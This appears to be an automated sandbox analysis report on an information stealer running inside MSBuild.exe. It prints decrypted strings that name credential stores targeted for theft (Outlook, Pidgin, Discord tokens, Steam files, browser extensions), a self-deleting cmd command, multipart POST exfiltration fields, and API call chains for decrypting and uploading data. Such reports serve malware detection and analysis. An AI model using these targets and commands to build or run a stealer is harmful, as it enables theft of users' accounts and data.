Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 00000001
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 00000002
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 00000003
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 00000004
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Pidgin
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \.purple\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: accounts.xml
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: token:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SteamPath
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \config\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ssfn*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: config.vdf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Steam\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: done
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: soft
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: https
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: POST
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: hwid
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: build
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: token
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: file_name
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: file
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: message
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: screenshot.jpg
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406A10 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA, 3_2_00406A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410830 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree, 3_2_00410830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040A150 BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider, 3_2_0040A150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406CF0 LocalAlloc,BCryptDecrypt, 3_2_00406CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406940 BCryptCloseAlgorithmProvider,BCryptDestroyKey, 3_2_00406940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040A560 StrCmpCA,BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 3_2_0040A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406980 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 3_2_00406980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy, 32_2_00406000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 32_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy, 32_2_00404B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 32_2_00407690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 32_2_00424090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 32_2_00409B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_0040ED90 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA, 32_2_0040ED90
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.5:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49902 version: TLS 1.2
Source: v7942.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151A96C FindFirstFileExW, 0_2_00007FF68151A96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose, 3_2_00414E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose, 3_2_00407210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose, 3_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose, 3_2_00415EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose, 3_2_00408360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose, 3_2_00413FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose, 3_2_004013F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose, 3_2_00413580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA, 3_2_004097B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose, 3_2_0040ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn, 3_2_00408C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00414950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA, 3_2_00409560
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF70668A96C FindFirstFileExW, 26_2_00007FF70668A96C
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B1A96C FindFirstFileExW, 30_2_00007FF707B1A96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_0040DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 32_2_0040DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00413AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh 29_2_0044A106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h] 29_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [ecx], bx 29_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [edi], cx 29_2_00429840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [00451018h] 29_2_0040F066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 29_2_00402800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h] 29_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h 29_2_004480C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h 29_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh] 29_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 29_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx] 29_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h] 29_2_00413143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] 29_2_0044D950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h] 29_2_0042D92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh 29_2_004019E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h] 29_2_0044AA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp], 8B8A8924h 29_2_0043F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h] 29_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h] 29_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ecx], dl 29_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 29_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh] 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh] 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h] 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h] 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [eax] 29_2_00448220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 29_2_004292C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h] 29_2_004482E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then lea ecx, dword ptr [eax+eax] 29_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then lea ecx, dword ptr [eax-40000000h] 29_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then lea edx, dword ptr [ecx+ecx] 29_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh] 29_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 29_2_0044C2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then push eax 29_2_00449B7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h] 29_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+ecx+44h] 29_2_00444300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 29_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 29_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh] 29_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h] 29_2_00433330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 29_2_00436BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], esi 29_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] 29_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebp, ebx 29_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+edx+68h] 29_2_00437BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ecx], dl 29_2_00411C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 29_2_00435C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+08h], ebx 29_2_00445C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 29_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx] 29_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch] 29_2_0042F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 29_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h] 29_2_00428CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 29_2_0044BD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax], cl 29_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh] 29_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [eax] 29_2_00448590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h] 29_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 29_2_0041AE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 29_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+10h], ecx 29_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, di 29_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h] 29_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add eax, esi 29_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h] 29_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [eax+esi] 29_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+10h], ecx 29_2_00438E39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah] 29_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 29_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 29_2_004236EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], cl 29_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 29_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esi+edx] 29_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 29_2_00432F60
